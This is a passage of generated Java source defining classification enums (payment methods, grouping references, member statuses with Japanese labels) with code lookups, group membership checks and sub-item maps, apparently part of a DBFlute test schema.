public static OptionalThing<PaymentMethod> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static PaymentMethod codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof PaymentMethod) { return (PaymentMethod)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static PaymentMethod nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<PaymentMethod> listAll() {
return new ArrayList<PaymentMethod>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<PaymentMethod> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
if ("recommended".equalsIgnoreCase(groupName)) { return listOfRecommended(); }
throw new ClassificationNotFoundException("Unknown classification group: PaymentMethod." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<PaymentMethod> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<PaymentMethod> clsList = new ArrayList<PaymentMethod>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of group classification elements. (returns new copied list) <br>
* 最も推奨されている方法 <br>
* The group elements:[ByHand]
* @return The snapshot list of classification elements in the group. (NotNull)
*/
public static List<PaymentMethod> listOfRecommended() {
return new ArrayList<PaymentMethod>(Arrays.asList(ByHand));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<PaymentMethod> groupOf(String groupName) {
if ("recommended".equals(groupName)) { return listOfRecommended(); }
return new ArrayList<PaymentMethod>(4);
}
@Override public String toString() { return code(); }
}
/**
* the test of reference variable in grouping map
*/
public enum GroupingReference implements CDef {
/** LAND_NAME */
LAND_NAME("LND", "LAND_NAME", emptyStrings())
,
/** SEA_NAME */
SEA_NAME("SEA", "SEA_NAME", emptyStrings())
,
/** IKSPIARY_NAME */
IKSPIARY_NAME("IKS", "IKSPIARY_NAME", emptyStrings())
,
/** AMPHI_NAME */
AMPHI_NAME("AMP", "AMPHI_NAME", emptyStrings())
;
private static final Map<String, GroupingReference> _codeClsMap = new HashMap<String, GroupingReference>();
private static final Map<String, GroupingReference> _nameClsMap = new HashMap<String, GroupingReference>();
static {
for (GroupingReference value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private GroupingReference(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.GroupingReference; }
/**
* Is the classification in the group? <br>
* サービスが利用できる会員 <br>
* The group elements:[LAND_NAME, SEA_NAME]
* @return The determination, true or false.
*/
public boolean isServiceAvailable() {
return LAND_NAME.equals(this) || SEA_NAME.equals(this);
}
/**
* Is the classification in the group? <br>
* The group elements:[LAND_NAME, SEA_NAME, IKSPIARY_NAME]
* @return The determination, true or false.
*/
public boolean isServicePlus() {
return LAND_NAME.equals(this) || SEA_NAME.equals(this) || IKSPIARY_NAME.equals(this);
}
/**
* Is the classification in the group? <br>
* The group elements:[AMPHI_NAME, LAND_NAME, SEA_NAME, IKSPIARY_NAME]
* @return The determination, true or false.
*/
public boolean isNestedPlus() {
return AMPHI_NAME.equals(this) || LAND_NAME.equals(this) || SEA_NAME.equals(this) || IKSPIARY_NAME.equals(this);
}
/**
* Is the classification in the group? <br>
* The group elements:[IKSPIARY_NAME]
* @return The determination, true or false.
*/
public boolean isOneDef() {
return IKSPIARY_NAME.equals(this);
}
/**
* Is the classification in the group? <br>
* The group elements:[LAND_NAME, SEA_NAME, IKSPIARY_NAME]
* @return The determination, true or false.
*/
public boolean isDupRef() {
return LAND_NAME.equals(this) || SEA_NAME.equals(this) || IKSPIARY_NAME.equals(this);
}
public boolean inGroup(String groupName) {
if ("serviceAvailable".equals(groupName)) { return isServiceAvailable(); }
if ("servicePlus".equals(groupName)) { return isServicePlus(); }
if ("nestedPlus".equals(groupName)) { return isNestedPlus(); }
if ("oneDef".equals(groupName)) { return isOneDef(); }
if ("dupRef".equals(groupName)) { return isDupRef(); }
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<GroupingReference> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof GroupingReference) { return OptionalThing.of((GroupingReference)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<GroupingReference> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static GroupingReference codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof GroupingReference) { return (GroupingReference)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static GroupingReference nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<GroupingReference> listAll() {
return new ArrayList<GroupingReference>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<GroupingReference> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
if ("serviceAvailable".equalsIgnoreCase(groupName)) { return listOfServiceAvailable(); }
if ("servicePlus".equalsIgnoreCase(groupName)) { return listOfServicePlus(); }
if ("nestedPlus".equalsIgnoreCase(groupName)) { return listOfNestedPlus(); }
if ("oneDef".equalsIgnoreCase(groupName)) { return listOfOneDef(); }
if ("dupRef".equalsIgnoreCase(groupName)) { return listOfDupRef(); }
throw new ClassificationNotFoundException("Unknown classification group: GroupingReference." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<GroupingReference> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<GroupingReference> clsList = new ArrayList<GroupingReference>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of group classification elements. (returns new copied list) <br>
* サービスが利用できる会員 <br>
* The group elements:[LAND_NAME, SEA_NAME]
* @return The snapshot list of classification elements in the group. (NotNull)
*/
public static List<GroupingReference> listOfServiceAvailable() {
return new ArrayList<GroupingReference>(Arrays.asList(LAND_NAME, SEA_NAME));
}
/**
* Get the list of group classification elements. (returns new copied list) <br>
* The group elements:[LAND_NAME, SEA_NAME, IKSPIARY_NAME]
* @return The snapshot list of classification elements in the group. (NotNull)
*/
public static List<GroupingReference> listOfServicePlus() {
return new ArrayList<GroupingReference>(Arrays.asList(LAND_NAME, SEA_NAME, IKSPIARY_NAME));
}
/**
* Get the list of group classification elements. (returns new copied list) <br>
* The group elements:[AMPHI_NAME, LAND_NAME, SEA_NAME, IKSPIARY_NAME]
* @return The snapshot list of classification elements in the group. (NotNull)
*/
public static List<GroupingReference> listOfNestedPlus() {
return new ArrayList<GroupingReference>(Arrays.asList(AMPHI_NAME, LAND_NAME, SEA_NAME, IKSPIARY_NAME));
}
/**
* Get the list of group classification elements. (returns new copied list) <br>
* The group elements:[IKSPIARY_NAME]
* @return The snapshot list of classification elements in the group. (NotNull)
*/
public static List<GroupingReference> listOfOneDef() {
return new ArrayList<GroupingReference>(Arrays.asList(IKSPIARY_NAME));
}
/**
* Get the list of group classification elements. (returns new copied list) <br>
* The group elements:[LAND_NAME, SEA_NAME, IKSPIARY_NAME]
* @return The snapshot list of classification elements in the group. (NotNull)
*/
public static List<GroupingReference> listOfDupRef() {
return new ArrayList<GroupingReference>(Arrays.asList(LAND_NAME, SEA_NAME, IKSPIARY_NAME));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<GroupingReference> groupOf(String groupName) {
if ("serviceAvailable".equals(groupName)) { return listOfServiceAvailable(); }
if ("servicePlus".equals(groupName)) { return listOfServicePlus(); }
if ("nestedPlus".equals(groupName)) { return listOfNestedPlus(); }
if ("oneDef".equals(groupName)) { return listOfOneDef(); }
if ("dupRef".equals(groupName)) { return listOfDupRef(); }
return new ArrayList<GroupingReference>(4);
}
@Override public String toString() { return code(); }
}
/**
* The test of relation reference
*/
public enum SelfReference implements CDef {
/** foo801 */
Foo801("801", "foo801", emptyStrings())
,
/** foo811 */
Foo811("811", "foo811", emptyStrings())
,
/** bar802: 0 */
Bar802("802", "bar802", emptyStrings())
,
/** baz803: 0 */
Baz803("803", "baz803", emptyStrings())
,
/** bar812: 0 */
Bar812("812", "bar812", emptyStrings())
,
/** baz813: 0 */
Baz813("813", "baz813", emptyStrings())
;
private static final Map<String, SelfReference> _codeClsMap = new HashMap<String, SelfReference>();
private static final Map<String, SelfReference> _nameClsMap = new HashMap<String, SelfReference>();
static {
for (SelfReference value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private SelfReference(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.SelfReference; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<SelfReference> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof SelfReference) { return OptionalThing.of((SelfReference)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<SelfReference> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static SelfReference codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof SelfReference) { return (SelfReference)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static SelfReference nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<SelfReference> listAll() {
return new ArrayList<SelfReference>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<SelfReference> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: SelfReference." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<SelfReference> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<SelfReference> clsList = new ArrayList<SelfReference>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<SelfReference> groupOf(String groupName) {
return new ArrayList<SelfReference>(4);
}
@Override public String toString() { return code(); }
}
/**
* The test of top only
*/
public enum TopCommentOnly implements CDef {
;
private static final Map<String, TopCommentOnly> _codeClsMap = new HashMap<String, TopCommentOnly>();
private static final Map<String, TopCommentOnly> _nameClsMap = new HashMap<String, TopCommentOnly>();
static {
for (TopCommentOnly value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private TopCommentOnly(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.TopCommentOnly; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<TopCommentOnly> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof TopCommentOnly) { return OptionalThing.of((TopCommentOnly)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<TopCommentOnly> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static TopCommentOnly codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof TopCommentOnly) { return (TopCommentOnly)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static TopCommentOnly nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<TopCommentOnly> listAll() {
return new ArrayList<TopCommentOnly>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<TopCommentOnly> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: TopCommentOnly." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<TopCommentOnly> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<TopCommentOnly> clsList = new ArrayList<TopCommentOnly>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<TopCommentOnly> groupOf(String groupName) {
return new ArrayList<TopCommentOnly>(4);
}
@Override public String toString() { return code(); }
}
/**
* the test of sub-item map for implicit classification
*/
public enum SubItemImplicit implements CDef {
/** Aaa: means foo */
Foo("FOO", "Aaa", emptyStrings())
,
/** Bbb: means bar */
Bar("BAR", "Bbb", emptyStrings())
;
private static final Map<String, SubItemImplicit> _codeClsMap = new HashMap<String, SubItemImplicit>();
private static final Map<String, SubItemImplicit> _nameClsMap = new HashMap<String, SubItemImplicit>();
static {
for (SubItemImplicit value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private static final Map<String, Map<String, Object>> _subItemMapMap = new HashMap<String, Map<String, Object>>();
static {
{
Map<String, Object> subItemMap = new HashMap<String, Object>();
subItemMap.put("regularStringItem", "value1<tag>");
subItemMap.put("regularNumberItem", "123");
subItemMap.put("regularVariousItem", "list:{\n ; reg\n ; var\n ; ite\n}");
subItemMap.put("listItem", "list:{\n ; aa\n ; bb\n ; cc\n}");
_subItemMapMap.put(Foo.code(), Collections.unmodifiableMap(subItemMap));
}
{
Map<String, Object> subItemMap = new HashMap<String, Object>();
subItemMap.put("regularStringItem", "value2<teg>");
subItemMap.put("regularNumberItem", "456");
subItemMap.put("regularVariousItem", "map:{\n ; reg = var\n ; ous = ite\n}");
subItemMap.put("mapItem", "map:{\n ; key11 = value11\n}");
subItemMap.put("containsLine", "va\nlue");
_subItemMapMap.put(Bar.code(), Collections.unmodifiableMap(subItemMap));
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private SubItemImplicit(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return _subItemMapMap.get(code()); }
public ClassificationMeta meta() { return CDef.DefMeta.SubItemImplicit; }
public String regularStringItem() {
return (String)subItemMap().get("regularStringItem");
}
public String regularNumberItem() {
return (String)subItemMap().get("regularNumberItem");
}
public Object regularVariousItem() {
return subItemMap().get("regularVariousItem");
}
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<SubItemImplicit> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof SubItemImplicit) { return OptionalThing.of((SubItemImplicit)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<SubItemImplicit> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static SubItemImplicit codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof SubItemImplicit) { return (SubItemImplicit)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static SubItemImplicit nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<SubItemImplicit> listAll() {
return new ArrayList<SubItemImplicit>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<SubItemImplicit> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: SubItemImplicit." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<SubItemImplicit> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<SubItemImplicit> clsList = new ArrayList<SubItemImplicit>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<SubItemImplicit> groupOf(String groupName) {
return new ArrayList<SubItemImplicit>(4);
}
@Override public String toString() { return code(); }
}
/**
* the test of sub-item map for table classification
*/
public enum SubItemTable implements CDef {
/** 正式会員: 正式な会員としてサイトサービスが利用可能 */
正式会員("FML", "正式会員", emptyStrings())
,
/** 退会会員: 退会が確定した会員でサイトサービスはダメ */
退会会員("WDL", "退会会員", emptyStrings())
,
/** 仮会員: 入会直後のステータスで一部のサイトサービスが利用可能 */
仮会員("PRV", "仮会員", emptyStrings())
;
private static final Map<String, SubItemTable> _codeClsMap = new HashMap<String, SubItemTable>();
private static final Map<String, SubItemTable> _nameClsMap = new HashMap<String, SubItemTable>();
static {
for (SubItemTable value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private static final Map<String, Map<String, Object>> _subItemMapMap = new HashMap<String, Map<String, Object>>();
static {
{
Map<String, Object> subItemMap = new HashMap<String, Object>();
subItemMap.put("key1", "1");
subItemMap.put("key2", "正式会員");
subItemMap.put("key3", null);
_subItemMapMap.put(正式会員.code(), Collections.unmodifiableMap(subItemMap));
}
{
Map<String, Object> subItemMap = new HashMap<String, Object>();
subItemMap.put("key1", "2");
subItemMap.put("key2", "退会会員");
subItemMap.put("key3", null);
_subItemMapMap.put(退会会員.code(), Collections.unmodifiableMap(subItemMap));
}
{
Map<String, Object> subItemMap = new HashMap<String, Object>();
subItemMap.put("key1", "3");
subItemMap.put("key2", "仮会員");
subItemMap.put("key3", null);
_subItemMapMap.put(仮会員.code(), Collections.unmodifiableMap(subItemMap));
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private SubItemTable(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return _subItemMapMap.get(code()); }
public ClassificationMeta meta() { return CDef.DefMeta.SubItemTable; }
public String key1() {
return (String)subItemMap().get("key1");
}
public String key2() {
return (String)subItemMap().get("key2");
}
public String key3() {
return (String)subItemMap().get("key3");
}
/**
* Is the classification in the group? <br>
* サービスが利用できる会員 <br>
* The group elements:[正式会員, 仮会員]
* @return The determination, true or false.
*/
public boolean isServiceAvailable() {
return 正式会員.equals(this) || 仮会員.equals(this);
}
/**
* Is the classification in the group? <br>
* The group elements:[退会会員]
* @return The determination, true or false.
*/
public boolean isLastestStatus() {
return 退会会員.equals(this);
}
public boolean inGroup(String groupName) {
if ("serviceAvailable".equals(groupName)) { return isServiceAvailable(); }
if ("lastestStatus".equals(groupName)) { return isLastestStatus(); }
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<SubItemTable> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof SubItemTable) { return OptionalThing.of((SubItemTable)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<SubItemTable> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
